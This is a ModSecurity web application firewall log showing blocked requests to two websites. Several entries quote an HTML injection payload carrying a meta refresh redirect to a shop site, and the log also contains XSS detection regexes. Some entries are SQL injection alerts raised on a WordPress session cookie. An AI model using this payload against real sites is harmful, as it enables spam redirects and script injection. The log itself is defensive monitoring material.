[ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.131686 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.131978 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.132639 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.133085 2026] [security2:error] [pid 1424905:tid 1424929] [client 27.78.84.116:57708] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFC4W8yzYoWG_eyCXCtgAAAVU"]
[Mon May 11 18:34:19.135803 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFCkWKUxpmnkK7zHysVgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:19.548277 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFC0WKUxpmnkK7zHysWAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:19.548566 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFC0WKUxpmnkK7zHysWAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:20.166455 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFC0WKUxpmnkK7zHysWAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:20.266195 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFDEWKUxpmnkK7zHysWQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:20.266482 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFDEWKUxpmnkK7zHysWQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:20.840396 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFDEWKUxpmnkK7zHysWQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:20.959359 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFDEWKUxpmnkK7zHysWwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:20.959642 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFDEWKUxpmnkK7zHysWwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:21.354274 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFDEWKUxpmnkK7zHysWwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:21.643927 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFDUWKUxpmnkK7zHysXQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:21.644250 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFDUWKUxpmnkK7zHysXQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:22.287088 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFDUWKUxpmnkK7zHysXQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:22.583954 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFDkWKUxpmnkK7zHysXwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:22.584399 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFDkWKUxpmnkK7zHysXwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:23.474360 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFDkWKUxpmnkK7zHysXwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:23.584380 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.585948 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.586137 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.587298 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.588753 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.589232 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.589924 2026] [security2:error] [pid 1411201:tid 1411250] [client 27.78.84.116:58089] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFD_y_GXSWIKeli0sgQQAAAIQ"]
[Mon May 11 18:34:23.709920 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFD0WKUxpmnkK7zHysZwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:23.710219 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFD0WKUxpmnkK7zHysZwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:24.354763 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFD0WKUxpmnkK7zHysZwAAARM"], referer: https://rentparadise.fr/wp-login.php
